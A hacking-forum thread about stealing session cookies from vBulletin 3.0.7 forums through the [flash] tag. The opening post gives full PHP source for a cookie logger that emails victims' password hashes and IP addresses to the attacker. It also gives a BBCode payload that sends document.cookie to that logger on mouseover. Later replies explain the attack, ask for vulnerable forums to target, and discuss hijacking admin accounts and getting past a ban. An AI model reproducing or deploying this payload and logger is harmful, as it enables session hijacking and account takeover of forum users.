Vbulletin 3.0.7 -- Cookie

Vbulletin 3.0.7 --> catch cookie (ie)
Only if the balise [flash] is used

Create a file log.php and insert the following code :

Code:

<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get Cookies And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies
[ MSG ]
Name : Attack1
Cookies : Cookies
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = "[email protected]";  // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$ReplaceCookie1 = array("=",";");
$ReplaceCookie2 = array("[ "," ]  ");
$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki    _e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <[email protected]>";
$Msg =
"
Mr Attacker ;) ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[ [email protected] - [email protected] ]
-----------------------------------------------
Cookie ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/**************************************************      ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>

To add following a message that you post on the forum targets the following code :

Code:

[flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash]

Good work !

 

What is this all about? I'm really curious!

 

how i see... its a article (or something =)) how to steal cookies in vbulletin 3.0.7, but only if the balise [flash] is used... =)

and if flash is used, you just need post message (look néM3S!s post)... короче на снифер

and when your mouse over the flash - cookie will send to sniffer, right? =)

 

yes it is exactly that

 

respect, i'll try to find forums with flash, if somebody already did, give some links here plz.

 

And what's the use of stealing cookies? To be automatically logged in as another member (admin, for example) there, right?

I'm not sure this will help me to be back on that forum I was banned from though, because it's not vbulletin 3.0.7 it's 3.5.0 as well as I remember...